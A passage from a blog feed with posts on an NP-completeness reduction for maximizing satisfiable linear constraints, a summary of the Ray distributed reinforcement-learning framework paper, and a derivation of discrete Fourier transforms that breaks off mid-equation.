solution?</p> <p>Removing a constraint is akin to relaxing the problem and we want to minimize the number of relaxations, so we’ll name our problem the <em>Least Relaxed Linear Program</em> or <em>LRLP</em> for short.</p> <h3 id="np-completeness">NP-Completeness</h3> <p>We’ll prove that LRLP is NP-Complete by reducing a known NP-Complete to it. Our choice is the <em>0-1 Integer Linear Program Feasibility</em> . Consider an Integer Linear Program (ILP) defined by the set of constraints</p> $(1) \quad A\vec{x} \le b$ <p>where $A$ is a $n \times m$ coefficient matrix of real values, $b$ is a vector $\mathbb{R}^n$ and $\vec{x}$ is a $m$-vector of 0 or 1, i.e. $\vec{x} \in \curly{0, 1}^m$. The problem consists of deciding whether there exists any $\vec{x}$ satisfying these constraints.</p> <p>We can solve this problem by reducing to LRLP. We include the original constraints (1) but relax the 0-1 integrality constraints by having $\vec{x} \in\mathbb{R}^m$. We then add $2m$ new constraints:</p> $(2) \quad x_j = 1 \quad j = 1, \cdots, m$ $(3) \quad x_j = 0 \quad j = 1, \cdots, m$ <p>Recall that an equality constraint can be implemented by 2 inequalities.</p> <p>Now, if the original ILP has a feasible integer solution, then it’s a candidate solution to the target LRLP, satisfying all $n$ of the (1) constraints plus exactly $m$ of the constraints between (2) and (3).</p> <p>Conversely, if the target LRLP can satisfy $n + m$ constraints (note this is an upper bound), it’s easy to construct a feasible integer solution to the original ILP.</p> <p>Hence, the original ILP has a feasible solution if and only if LRLP satisfies $n + m$ constraints.</p> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="https://www.kuniga.me/blog/2012/02/05/lagrangean-relaxation-theory.html">Lagrangean Relaxation - Theory</a>. This problem seems related to the Lagrangean Relaxation, in which we remove some of the constraints and add them to the objective function and penalize violated constraints. How good of a solution would we get if we relaxed all the constraints and tried to optimize it? In theory the multipliers would be real values, so we might end up picking fractions of constraints, but I wonder if in practice it would yield good approximations.</li> </ul> <h2 id="references">References</h2> <ul> <li>[<a href="https://math.stackexchange.com/questions/2969290/maximizing-the-total-number-of-feasible-constraints-of-a-linear-program">1</a>] Mathematics - Maximizing the total number of feasible constraints of a linear program</li> </ul>Guilherme KunigamiHere’s a puzzle I thought about recently: given a set of constraints of the form $ax \le b$, where $a, b \in \mathbb{R}$, find the maximum number of constraints we can choose such there exists $x \in \mathbb{R}$ that satisfies all of them. For example, given $x \le 2$, $3x \le 7$, $-2x \le 1$, $-2x \le -9$, we can choose $x \le 2$, $x \le 3$, $-2x \le 1$, then any $\frac{-1}{2} \le x \le 2$ satisfies all 3 of them. This also happens to be the maximum number of constraints we can choose. In this post we’ll explore a solution to this puzzle. Feel free to stop here and solve it before proceeding.Paper Reading - Ray2021-08-04T00:00:00+00:002021-08-04T00:00:00+00:00https://www.kuniga.me/blog/2021/08/04/ray<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll discuss the paper <em>Ray: A Distributed Framework for Emerging AI Applications</em> by Moritz et al . Ray is a framework aimed at Reinforcement Leaning (RL) applications.</p> <!--more--> <h2 id="background">Background</h2> <p>Since Ray is specifically targeted for RL applications, it’s worth going over it briefly.</p> <h3 id="reinforcement-learning">Reinforcement Learning</h3> <p>Reinforcement Learning is one of the three machine learning paradigms  (in addition to supervised and unsupervised learning). It’s usually modeled as a Markov decision process (MDP).</p> <p>The model contains two entities: the agent and the environment.</p> <p>The <strong>environment</strong> represents the real-world (or some simulator of it), for example, in self-driving cars, the real world is basically the input to all the sensors and cameras in the car. At any given moment the environment is in one of the states from $S$, which could be GPS coordinates and speed for example.</p> <p>The environment can take in an action from a set $A$ which will move it to another state. This process is called <strong>simulation</strong> since it will require either performing the action in real-world (speed the car up) or more likely simulating the outcome of the action to compute the resulting state. This transition is probabilistic, defined by $P_a(s, s’)$, that is the probability of transitioning from $s$ to $s’$ when action $a$ is performed.</p> <p>There is a <strong>reward</strong> associated to the transition from states $s$ to $s’$ when action $a$ is performed, $R_a(s, s’)$.</p> <p>The choice of action is performed based on a probability function $\pi$, called <strong>policy</strong>, defined as $\pi: A \times S \rightarrow [0, 1]$, where $\pi(a, s)$ represents the probability the action $a$ will be chosen when we’re in state $s$. This process is known as <strong>serving</strong>. This policy is the variable that the RL algorithm will modify.</p> <p>In an ideal world, we’ll be able to tell the best action to perform from the environment either analytically or by simulating all possible actions, but in practice this is infeasible, hence we work with probabilistic functions.</p> <p>We can evaluate a policy against an environment, which we call <strong>rollout</strong>, by starting the environment from an initial state, then iteratively computing the action and getting the results (new state + reward) from the environment. The sequence of states and rewards resulting from this simulation is called <strong>trajectory</strong> and is the product of this function:</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-04-ray/pseudo-code-rollout.png" alt="pseudo-code (Figure 2 from )" /> <figcaption>Figure 1: Pseudo-code for rollout.</figcaption> </figure> <p>Given a set of trajectories evaluated previously, the goal of the algorithm is to find the policy $\pi$ that maximizes the rewards across all trajectories. This process is called <strong>training</strong>, and we keep repeating this process until the policy converges.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-04-ray/pseudo-code-train-policy.png" alt="pseudo-code (Figure 2 from )" /> <figcaption>Figure 2: Pseudo-code for train_policy.</figcaption> </figure> <h2 id="requirements">Requirements</h2> <p>To tailor the system to RL applications, Ray combines the <em>Serving</em>, <em>Simulation</em> and <em>Training</em> steps within itself, for the sake of reducing latency.</p> <p>These steps vary in requirements, for example performing an action might take a few milliseconds while training could take hours. It’s necessary thus to support <em>heterogeneous computation</em>, not only in terms of execution time but also hardward (GPUs, CPUs).</p> <p>Some <em>simulations</em> require state to be carried from one function to the next thus the system should support <em>stateful computation</em>. In a similar vein, one function might spawn new functions to be executed, which cannot be known ahead of time, so the system should allow <em>dynamic execution</em>.</p> <p>It should also enable integrating with existing simulators and deep learning frameworks.</p> <p>After covering the architecture of the system, we’ll revisit these requirements to see how they’re satified.</p> <h2 id="components">Components</h2> <p>These are some high-level entities the system uses.</p> <h3 id="tasks-and-actors">Tasks and Actors</h3> <p>There are two types of remote function execution:</p> <ul> <li><strong>Task</strong> is <em>stateless</em></li> <li><strong>Actor</strong> is <em>stateful</em></li> </ul> <p>Both tasks and actors are executed by a remote worker. Both are non-blocking by default but the API provides a way to wait (i.e. block) for the computation to finish.</p> <p>It’s possible for remote functions to invoke other remote functions (nested remote calls). In addition, actors can be passed as parameters to remote functions, so its internal state can be reused.</p> <p>Perhaps we can make analogies with programming: tasks are pure functions and actors are instances of classes. Perhaps a more precise description would be that actor <em>methods</em> are the stateful execution.</p> <h3 id="dynamic-task-graph">Dynamic Task Graph</h3> <p>The execution of both tasks and actor methods is automatically triggered by the system when their inputs become available. To know when this happens, Ray builds a DAG to track dependencies.</p> <p>Nodes in this graph can be either: data, tasks or actor methods. There are 3 types of edges:</p> <ul> <li><strong>Data</strong> (data → task) - when task depends on some data as input</li> <li><strong>Control</strong> (task → task) - nested remote calls</li> <li><strong>Stateful</strong> (actor method → actor method) - sequential calls of methods within the same actor</li> </ul> <p>This graph is <em>dynamic</em> in the sense that it changes during the execution of the program. As new tasks and actors are created, nodes and edges are added.</p> <h2 id="architecture">Architecture</h2> <p>There are three types of nodes in the system: worker node, global schedulers and the global control state (GCS). Figure 3 shows an example of a configuration of the nodes.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-08-04-ray/components.png" alt="pseudo-code (Figure 2 from )" /> <figcaption>Figure 3: Example configuration of workers, schedulers and GCS.</figcaption> </figure> <p>Let’s look at each of these node types in more detail.</p> <h3 id="worker-node">Worker Node</h3> <p>Within each worker node we have a few processes and storage.</p> <ul> <li>Driver - a process executing the user program (the non-remote functions)</li> <li>Worker - a process executing a task</li> <li>Actor - a stateful process executing methods from an actor</li> <li>Local scheduler - when a task is created inside this node, the local scheduler either executes it locally (by sending it to a worker), or, if the node is overloaded, delegate to the global scheduler to route to a different node.</li> <li>Oject store - stores the input/output of tasks</li> </ul> <p>Let’s cover the object store in more details. It’s an in-memory storage shared between the worker processes in this node. The input to functions must be available in the object store before starting.</p> <p>Suppose a worker in node $N_1$ needs data $a$ to execute, but it doesn’t have it locally. It then asks the <em>global control state</em> who knows which node, say $N_0$ has that input. Then $N_1$ copies the data directly from $N_0$ and stores it locally.</p> <p>Each object has an associated ID and its immutable (mutating the object means creating new IDs), thus keeping an object replicated in multiple places is safe from the consistency perspective. This mechanism of replicating the data also helps to distribute the load since if there is some hot data, it’s likely replicated in multiple nodes which the GCS can load-balance from.</p> <p><em>My comment:</em> One interesting aspect of Ray is that the process that executes the user program is co-located with the one that executes the heavy-load. In other distributed execution systems I’ve seen, they’re separated, for example a client sending some SQL input to an engine which will execute it in a backend.</p> <h3 id="global-scheduler">Global Scheduler</h3> <p>As discussed in the previous section, the global scheduler is only used if the local scheduler in the node decides not to schedule it locally, hence the paper calls this scheduling strategy <em>bottom-up</em> scheduling.</p> <p>The global scheduler uses a bunch of different criteria to determine which machine it will assign a task to, including:</p> <ul> <li>Estimated time the time will stay in the queue</li> <li>Transfer time (a function of input size and network bandwidth)</li> </ul> <p>The scheduler gets information like the tasks’ input from the GCS. It also probes a worker node to determine its queu size and resources via heartbeat.</p> <p><em>My question:</em> does it need to probe all nodes or only a subset of them?</p> <p>One thing that the scheduler does <strong>not</strong> do is <em>task dispatching</em>, i.e. retreiving the inputs for the task to execute. This is done by the GCS.</p> <p>By staying stateless it becomes easy to scale the global scheduler horizontally.</p> <h3 id="global-control-state-gcs">Global Control State (GCS)</h3> <p>The GCS holds the metadata of the system. As seen in Figure 3, it stores:</p> <ul> <li>Table of task metadata</li> <li>Table of object metadata - which node contains what object (data), note that all objects have an associated ID.</li> <li>The dynamic task graph</li> </ul> <p>It’s worth calling out that the GCS does not keep the actual data. It’s distributed across the worker nodes.</p> <p>The GCS is implemented using a sharded key-value store (one Redis per shard). The shards are done by object and task IDs. Each shard uses chain-replication  for fault-tolerance.</p> <p><em>My question:</em> why not let Redis handle the sharding? Perhaps the system wants more control over the replication strategy?</p> <p>Periodically, GCS flushes the data to disk, both to keep the memory usage capped but also to serve as snapshot for recovery.</p> <h2 id="results">Results</h2> <p>The paper provides a bunch of micro-benchmarks testing the performance of specific features, like end-to-end scalability, delays from GCS, tasks and actors’ fault-tolerance mechanisms, etc.</p> <p>It also compares the performance against multiple existing systems including Clipper, Horovod, OpenMPI, etc. And it outperforms them in many RL-specific tasks.</p> <p>Finally it compares features and designs with some of the systems above as well, and points our where they fall short of efficiently meeting RL application requirements.</p> <h2 id="analysis">Analysis</h2> <p>As promised, we revisit the requirements from the Motivation section to see how they were addressed:</p> <ul> <li>Combines the Serving, Simulation and Training - it does it by having a simgle Python API for computing tasks and actors. It doesn’t distinguish between these steps.</li> <li>Support heterogeneous computation - tasks can be used for a variety of workloads and be run in different hardware. Coupled with the scheduler, which knows these requirements and th hardware settings, heteregenous tasks can be modeled transparently.</li> <li>Support stateful computation - the actors models this use case.</li> <li>Integrates with existing simulators and deep learning frameworks - by virtual of allowing arbitrary Python execution it can leverage existing libraries.</li> </ul> <h2 id="conclusion">Conclusion</h2> <p>I really like the idea of co-locating data with the execution node. This is a natural way to distribute the data and avoids a lot of the latency of storing it in a centralized database.</p> <p>I haven’t dealt with Reinforcement Learning before, so I’m sure I’m missing a lot of the details for the motivations behind this system, but I’m happy to have learned a bit about it and some other distributed concepts (in the Appendix).</p> <p>I originally thought Ray was a framework for general Python distributed computing and this is what motivated me to read the paper. Well, it might as well be, but I didn’t know the strong focus on RL applications.</p> <h2 id="appendix">Appendix</h2> <p>Here we discuss some terminology and concepts I had to look up to understand the paper.</p> <h3 id="allreduce">Allreduce</h3> <p>All reduce is a distributed protocol for nodes in a system to share their data among all the nodes, while consolidating (reducing) them in the process. One contrived example is one in which each node holds a number and the goal is to each node hold the sum of the values from all nodes in the system.</p> <p>One naïve way to do this is to have each node send its data to all other nodes requiring $O(n^2)$ network transmissions, then adding the values received locally, but it’s possible to do it with $O(n)$ transmissions.</p> <p>This <a href="https://towardsdatascience.com/visual-intuition-on-ring-allreduce-for-distributed-deep-learning-d1f34b4911da">very informative article</a> by Edir Garcia Lazo provides a visual explanation of a popular implementation of the protocol called <em>ring allreduce</em>.</p> <h3 id="chain-replication">Chain-replication</h3> <p>The basic idea is to have a chain (or linked list) of storages $s_1, s_2, \cdots, s_N$, where writes are peformed in $s_1$ (head) but reads from $s_N$ (tail). When $s_i$ gets written to, it propagates the write to $s_{i+1}$.</p> <p>Once $s_N$ is written to, it sends an <em>ack</em> back to $s_{N-1}$, which in turn sends it to the previous node, all the way up to $s_1$.</p> <p>By reading from the tail we guarantee the data has been replicated in all nodes.</p> <p>When a node fails it can be removed as if we were removing a node from a linked list. Losses could occur if they didn’t have a chance to be propagated.</p> <p>It’s interesting to note that when node $s_i$ fails, the pending acks from $s_{i+1}$ will now go to $s_{i-1}$ and from the perspective of the other nodes nothing happened. If node $s_i$ fails after receiving a write request but before sending it to $s_{i+1}$, that would be lost, but node $s_{i-1}$ could have a retry mechanism if it didn’t receive an ack in some time.</p> <h3 id="lineage-storage">Lineage Storage</h3> <p>To recover from failure, systems usually persist data from memory to disk. The idea is to, from time to time, persist snapshots of the state of the system and also the exact steps performed since that snapshot was taken.</p> <p>One type of implementation, called <em>global checkpoint</em>, only relies on the snapshots, logging no steps. On recovery, it has to re-run the job from the latest checkpoint, and if the execution is non-deterministic, it might lead to different results.</p> <p>On the other extreme implementation we have what’s known as <em>lineage</em>, which only logs the steps but no snapshots, so on recovery it needs to replay the whole computation .</p> <p>Steps can usually be logged more frequently than state snapshots because of the size, but for small tasks they might pose a bigger overhead.</p> <h3 id="parameter-server">Parameter Server</h3> <p>According to , <strong>parameters servers</strong>:</p> <blockquote> <p>store the parameters of a machine learning model (e.g., the weights of a neural network) and to serve them to clients (clients are often workers that process data and compute updates to the parameters)</p> </blockquote> <p>It’s usually implemented as key-value store.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.usenix.org/system/files/osdi18-moritz.pdf">1</a>] Ray: A Distributed Framework for Emerging AI Applications</li> <li>[<a href="https://en.wikipedia.org/wiki/Reinforcement_learning">2</a>] Reinforcement learning</li> <li>[<a href="https://towardsdatascience.com/visual-intuition-on-ring-allreduce-for-distributed-deep-learning-d1f34b4911da">3</a>] Visual intuition on ring-Allreduce for distributed Deep Learning</li> <li>[<a href="https://ray-project.github.io/2018/07/15/parameter-server-in-fifteen-lines.html">4</a>] Implementing A Parameter Server in 15 Lines of Python with Ray</li> <li>[<a href="https://medium.com/coinmonks/chain-replication-how-to-build-an-effective-kv-storage-part-1-2-b0ce10d5afc3">5</a>] Chain replication : how to build an effective KV-storage</li> <li>[<a href="https://cs-people.bu.edu/liagos/material/sosp19.pdf">6</a>] Lineage Stash: Fault Tolerance Off the Critical Path</li> </ul>Guilherme KunigamiIn this post we’ll discuss the paper Ray: A Distributed Framework for Emerging AI Applications by Moritz et al . Ray is a framework aimed at Reinforcement Leaning (RL) applications.Discrete Fourier Transforms2021-07-31T00:00:00+00:002021-07-31T00:00:00+00:00https://www.kuniga.me/blog/2021/07/31/discrete-fourier-transform<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll study three flavors of discrete Fourier transforms, the classic <em>Discrete Fourier Transform</em> but also <em>Discrete Fourier Series</em> and <em>Discrete-Time Fourier Transform</em>.</p> <p>We’ll focus on their mathematical rather than their physical interpretation and will come up with their formulas from linear algebra principles. Later we’ll also discuss the difference between each type of transform.</p> <!--more--> <h2 id="signals">Signals</h2> <p>Let’s review some basics of signals which will be necessary in later sections.</p> <p>But before we start, a note on notation: in signal processing, discrete time signals are often denoted as $x[t]$ as opposed to $x_t$ to distinguish from their continuous counterpart, which can be a bit confusing when mixing with mathematical notation from linear algebra. I’ll use the $x_t$ notation for consistency. Then referring to the signal as a whole, we’ll use bold, $\vec{x}$.</p> <p><strong>0-based index:</strong> in mathematical notation we often start the array at index 1 but we’ll do a lot of arithmetic with the indexes so it’s convenient to start at 0.</p> <h3 id="signals-as-vectors">Signals as Vectors</h3> <p>Discrete-time signals can be naturally mapped to vectors if we take each timestamp as a dimension. For example, if $x_t$ represents amplitudes sampled at regular intervals from $t=0$ to $t=N-1$, then we have the vector $\vec{x} = [x_0, \cdots, x_{N-1}]$.</p> <p>Henceforth we’ll use signals and vectors interchangeably.</p> <h3 id="classes-of-signals">Classes of Signals</h3> <p>Let’s now consider some classes of signals. When $N$ is finite we have <strong>finite</strong> signals. Easy-peasy. When $N$ is infinite we have a few subdivisions:</p> <p><strong>Periodic</strong> when the signal has a repeating pattern and can be represented by:</p> $x_t = x_{t + kN} \qquad k \in \mathbb{Z}$ <p>where $N$ is the length of the period.</p> <p><strong>Aperiodic</strong> There’s not periodicity in the signal, so it cannot be represented succinctly:</p> $\cdots, x_{-2}, x_{-1}, x_{0}, x_{1}, x_{2}, \cdots$ <p>Note that infinite signal on both sides.</p> <p><strong>Periodic extension</strong> when we convert a finite signal into an infinite periodic one by repeating it indefinitely. More formaly, if $\vec{x}$ is a finite signal, we can obtain the periodic signal $\vec{y}$ as:</p> $y_t = x_{t \Mod N} \qquad t \in \mathbb{Z}$ <p><strong>Finite-support</strong> is another way to convert a finite signal into an infinite one, by “padding” the left and right with 0s, so if $\vec{x}$ is a finite signal, we can obtain the infinite signal $\vec{y}$ as:</p> $\begin{equation} y_t=\left\{ \begin{array}{@{}ll@{}} x_t, &amp; \text{if}\ 0 \le t \le N-1 \\ 0, &amp; \text{otherwise} \end{array}\right. \end{equation}$ <h3 id="properties">Properties</h3> <p><strong>Energy</strong> of a signal is defined as the sum of the square of its amplitudes, that is</p> $E_x = \sum_{t \in Z} \abs{x_t}^2$ <p>which is the square of the norm of the vector $\vec{x}$, that is, $\norm{\vec{x}}^2$.</p> <p>A signal has <strong>finite energy</strong> if $E_x &lt; \infty$, which as we saw in our <a href="https://www.kuniga.me/blog/2021-06-26-hilbert-spaces.html">Hilbert Spaces post</a>, is equivalent to $\vec{x}$ being a square summable sequence, that is $\vec{x} \in \ell^2$.</p> <h2 id="complex-exponentials">Complex Exponentials</h2> <p>We’ll focus on a specific signal defined as:</p> $x_t = A e^{i (\omega t + \phi)}$ <p>$A$ is a scaling factor and correspond to the amplitude of the signal, $\omega$ is the frequency and $\phi$ is the initial phase.</p> <p>Note: in electrical engineering we often use $j$ as the imaginary part of a complex number to disambiguate from the variable used to refer to current, $i$. I’ll stick to the math convention, $i$, since we do not deal with such ambiguity in this post.</p> <p>Using Euler’s identity, we can express it as</p> $x_t = A [\cos (\omega t + \phi) + i \sin(\omega t + \phi)]$ <p>The argument to $\cos()$ and $\sin()$ is given in radians, which can be seen as revolution in a circle, $2\pi$ being a full revolution.</p> <p><strong>Periodicity.</strong> If we want $\cos(\omega t + \phi)$ to be periodic, we need to choose $\omega$ so that $\omega t$ will be a full revolution at some point, that is, it will be a multiple of $2\pi$ (note that we don’t need $\phi$ since it’s just the offset of the revolution).</p> <p>That is, we want $\omega t = 2\pi k$, $k \in \mathbb{Z}$ or</p> $t = \frac{2\pi k}{\omega}$ <p>Since $t \in \mathbb{Z}$, this is equivalent to say that if $\omega$ divides $2\pi k$, then both $\cos (\omega t + \phi)$ and $\sin(\omega t + \phi)$ are periodic and so is $x_t$.</p> <p>If we plot a line chart with $n$ as the x-axis and $cos (\omega n + \phi)$ the y-axis, we’ll see a points from a sinusoid. More familiar terms for $\phi$ is <em>offset</em> and for $\omega$ is <em>step</em>. A simple Python snipet to generate data points is:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">ys</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">N</span><span class="p">):</span> <span class="n">ys</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">cos</span><span class="p">(</span><span class="n">t</span><span class="o">*</span><span class="n">step</span> <span class="o">+</span> <span class="n">offset</span><span class="p">))</span></code></pre></figure> <p>The following graph displays samples using $\phi = \pi/2$ and $\omega = \pi/10$ and $N = 100$:</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-07-31-dft/cos.png" alt="Chart with samples from cosine function" /> <figcaption>Figure 1: Samples from cosine function</figcaption> </figure> <h3 id="complex-values">Complex values</h3> <p>What does a complex number refer to in the real world? The insight provided by  is that $\mathbb{C}$ is just a convenient way to represent 2 real-valued entities. We could work with $\mathbb{R}^2$ all along, but the relationship between the two entities is such that complex numbers and all the machinery around it works neatly for signals.</p> <p>We can visualize this in 3d, the 2 dimensions representing both components of the signal value and another the time:</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-07-31-dft/heyser-corkscrew.png" alt="3d Line chart: Heyser Corkscrew" /> <figcaption>Figure 2: Heyser Corkscrew by A. Duncan .</figcaption> </figure> <h2 id="discrete-fourier-transform">Discrete Fourier Transform</h2> <h3 id="fourier-basis">Fourier Basis</h3> <p>We’ll now define a basis for the space $\mathbb{C}^N$ using the complex exponential signals described above.</p> <p>Let $\vec{u}^{(k)}$ be a family (indexed by $k$) of finine complex exponential signals defined by:</p> $u_t^{(k)} = e^{i \omega_k t} \qquad n = 0, \cdots, N-1$ <p>We want each member of the family to have a different $\omega_k$. We’ll now see how to obtain $N$ such values.</p> <p>The key point is that we will use this finite signal to generate a infinite periodic one via the periodic extension, in which case the $N$-th element should be the same as the $0$-th:</p> $u_0^{(k)} = u_N^{(k)} = e^{i \omega_k 0} = 1$ <p>We can then write:</p> $u_N^{(k)} = (e^{i \omega_k})^N = 1$ <p>This is the equation for <a href="https://en.wikipedia.org/wiki/Root_of_unity">root of unit</a>, that is a complex number that yields 1 when raised to some power $N$.</p> <p>For this case in particular, there are $N$ possible values satisfying this equation, namely:</p> $e^{\frac{i 2\pi m}{N}} \qquad m = 0, \cdots, N-1$ <p>So we can choose $\omega_k = \frac{2 \pi k}{N}$ and obtain $N$ distinct values. We can verify that for $t = N$,</p> $e^{i \omega_k N} = e^{i 2 \pi k} = e^{i 2 \pi} = 1$ <p>The signal $\vec{u}^{(k)}$ can now be re-written as</p> $u_t^{(k)} = e^{i \frac{2 \pi k t}{N}} \qquad t, k = 0, \cdots, N-1$ <p>The inner product of two elements $\vec{u}^{(n)}$ and $\vec{u}^{(m)}$ is</p> $\langle \vec{u}^{(n)}, \vec{u}^{(m)} \rangle = \sum_{t=0}^{N-1} u^{(n)} \bar{u}^{(m)}$ <p>Expanding their definition, and using the fact that the complex conjugate of $e^{ix}$ is $e^{-ix}$ we have:</p> $= \sum_{t=0}^{N-1} e^{i (2 \pi n t)/N} e^{- i (2 \pi m t)/N}$ $= \sum_{t=0}^{N-1} e^{i (2 \pi (n - m) t)/N}$ <p>Let’s define $\alpha = e^{i (2 \pi (n - m))/N}$, so the sum above is</p> $= \sum_{t=0}^{N-1} \alpha^t$ <p>If $n = m$, then $\alpha = 1$, so the sum above is $N$. If $n \neq m$, we can use the close form of this geometric series:</p> $= \frac{1 - \alpha^N}{1 - \alpha}$ <p>We have that $\alpha^N = e^{i (2 \pi (n - m))} = 1$ and $\alpha \ne 1$ (since $0 &lt; (2 \pi (n - m))/N &lt; 2 \pi$), so the series above is 0. Summarizing:</p> $\begin{equation} \langle \vec{u}^{(n)}, \vec{u}^{(m)} \rangle =\left\{ \begin{array}{@{}ll@{}} N, &amp; \text{if}\ n = m \\ 0, &amp; \text{otherwise} \end{array}\right. \end{equation}$ <p>which proves that the vectors in the family are mutually orthogonal. The above also shows that the length of the vector is $\sqrt{N}$, since $\norm{\vec{u}^{(n)}}^2 = \langle \vec{u}^{(n)}, \vec{u}^{(n)} \rangle = N$. So if we want to make these <em>orthonormal</em> we just need to include the $\frac{1}{\sqrt{N}}$ factor in $\vec{u}^{(n)}$:</p> $u_t^{(k)} = \frac{1}{\sqrt{N}} e^{i \frac{2 \pi k t}{N}} \quad t = 0, \cdots, N-1$ <p>This shows $\vec{u}^{(k)}$ forms a basis for $C^N$, which is also know as <em>Fourier basis</em>.</p> <h3 id="dft-as-a-change-of-basis">DFT as a Change of Basis</h3> <p>Consider $\vec{x} \in \mathbb{C}^N$. It’s usually represented as $\vec{x} = (x_0, \cdots, x_{N-1})$ where $x_i$ is the coefficient of the linear combination of the canonical basis (i.e. $(1, \cdots, 0), (0, 1, \cdots, 0), \cdots (0, \cdots, 1)$) that generates $\vec{x}$.</p> <p>We can also represent $\vec{x}$ as a linear combination of the Fourier basis, that is $\vec{u}^{(k)}$:</p> $\vec{x} = \sum_{k=0}^{N-1} \lambda_k \vec{u}^{(k)}$ <p>Recalling each element in $\vec{u}^{(k)}$ is defined as $u_t^{(k)} = \frac{1}{\sqrt{N}} e^{i \frac{2 \pi k t}{N}}$, $t = 0, \cdots, N-1$, we can also express a specific element in $x_t \in \vec{x}$:</p> $(1) \quad x_t = \sum_{k=0}^{N-1} \lambda_k {u}^{(k)}_t = \frac{1}{\sqrt{N}} \sum_{k=0}^{N-1} \lambda_k e^{i \frac{2 \pi k t}{N}}$ <p>This linear operation is invertible, so we can find $\lambda_k$ from $\vec{x}$:</p> $(2) \quad \lambda_k = \frac{1}{\sqrt{N}} \sum_{t=0}^{N-1} x_t e^{- i \frac{2 \pi t k}{N}}$ <p>Expression (2) should look familiar! It’s the <strong>discrete Fourier transform</strong>, while (1) is the <strong>inverse discrete Fourier transform</strong>. A more common form is to not include the factor $\frac{1}{\sqrt{N}}$ in $\vec{\lambda}$ by having</p> $\quad \lambda'_k = \sum_{t=0}^{N-1} x_t e^{- i \frac{2 \pi t k}{N}}$ <p>and then include it in (1):</p> $(3) \quad x_t = \frac{1}{N} \sum_{k=0}^{N-1} \lambda'_k e^{i \frac{2 \pi k t}{N}}$ <p>In signal processing, $\vec{x}$ is said to be in <em>time domain</em>, while $\vec{\lambda}$ in the <em>frequency domain</em>. In our vector space point of view, they can be seen as the representation of $\vec{x}$ in different basis, and the Fourier transform is a linear transformation that can be interpreted as a change of basis, mapping one set of coefficients into the other.</p> <h2 id="discrete-fourier-series">Discrete Fourier Series</h2> <p>The Discrete Fourier Series (DFS) generalizes the Discrete Fourier Transform (DFT) for signals $\widetilde{\vec{x}}$ which are infinite but periodic, that is, they have finite repeating pattern $\vec{x} \in \mathbb{C}^N$. The vector $\vec{u}^{(k)}$ is still the same except is now has infinite length:</p> $u_t^{(k)} = \frac{1}{\sqrt{N}} e^{i \frac{2 \pi k t}{N}} \quad t \in Z$ <p>Note that $\vec{u}^{(k)}$ is periodic.</p> <p>The interesting part is we still only need $N$ vectors $\vec{u}^{(k)}$ to represent $\widetilde{\vec{x}}$, because even though it’s infinite in length, the pattern is finite. As an example to help with the intuition is the infinite periodic vector, consider $(1, 2, 3, 1, 2, 3, \cdots)$, with a finite pattern $(1, 2, 3)$. It can be defined as linear combination of only 3 infinite periodic vectors $(1, 0, 0, 1, 0, 0, \cdots)$, $(0, 1, 0, 0, 1, 0, \cdots)$ and $(0, 0, 1, 0, 0, 1, \cdots)$.</p> <p>Equation (1) then becomes:</p> $\widetilde{x}_t = \sum_{k=0}^{N-1} \lambda_k {u}^{(k)}_t = \frac{1}{\sqrt{N}} \sum_{k=0}^{N-1} \lambda_k e^{i \frac{2 \pi k t}{N}}$ <p>Note that $\vec{\lambda}$ is of finite length $N$, but we can use periodic extension to turn into a infinite periodic vector $\widetilde{\vec{\lambda}}$ in which case the inverse applies:</p> $\widetilde{\lambda}_t = \frac{1}{\sqrt{N}} \sum_{k=0}^{N-1} x_k e^{- i \frac{2 \pi k t}{N}}$ <h2 id="discrete-time-fourier-transform">Discrete-Time Fourier Transform</h2> <p>The Discrete-Time Fourier Transform (DTFT) generalizes the Discrete Fourier Transform (DFT) for signals which are infinite and <em>aperiodic</em>.</p> <p>We’ll see how to define the transform using the same basic ideas we did for DFT. Before that, let’s revisit the concept of <em>Riemann sum</em>.</p> <h3 id="riemann-sum">Riemann Sum</h3> <p>The <strong>Riemman sum</strong> is a way to approximate the area under a continuous curve with discrete sum. This is basically the algorithm we use to compute the integral of a function in numerical analysis.</p> <p>More formally, suppose we want to integrate $f(x)$ for $a \le x \le b$ ($x \in \mathbb{R}$). The idea is to define $N - 1$ discrete intervals for $x$, $[x_0, x_1], [x_1, x_2], \cdots, [x_{n-2}, x_{n-1}]$, where $x_0 = a$, $x_{n-1} = b$ and $\Delta_{x_i} = x_{i+1} - x_i$, then choose a representative $x_i^{*} \in [x_i, x_{i+1}]$ and sum their areas:</p> $\int_{a}^{b} f(x) dx = \lim_{N \rightarrow \infty} \sum_{i=0}^{N-2} f(x^{*}_i) \Delta_{x_i}$ <h3 id="dtft-as-a-limit-of-a-dft">DTFT as a Limit of a DFT</h3> <p>We can now build some intuition by considering how the DFT looks like when $N \rightarrow \infty$.</p> <p>As before, we’ll define $\omega_k = \frac{2 \pi k}{N}$ for $k = 0, \cdots, N-1$ and $\vec{u}^{(k)}$:</p> $\vec{u}^{(k)}_t = e^{i \omega_k t} \quad t \in \mathbb{Z}$ <p>And as before we can express any infinite signal $\vec{x}$ as a linear combination of $\vec{u}^{(k)}$ (3):</p> $(4) \quad x_t = \frac{1}{N} \sum_{k = 0}^{N - 1} \lambda_k e^{i \omega_k t}$ <p>We’ll massage (4) so that it’s defined in terms of $\omega_k$ and it looks like the right side of the Riemman sum.</p> <p>Let’s define $\Delta_\omega$ as the distance between consecutive $\omega_k$, so $\Delta_{\omega_k} = \omega_{k + 1} - \omega_{k} = \frac{2\pi}{N}$. Note that $\Delta_{\omega_k}$ does not depend on the value of $k$, so we can also say $\Delta_{\omega_k} = \Delta_{\omega}$.</p> <p>We can get rid of the $\frac{1}{\sqrt{N}}$ in (4) by defining it in terms of $\Delta_\omega$:</p> $\quad x_t = \frac{\Delta_{\omega}}{2 \pi} \sum_{k = 0}^{N - 1} 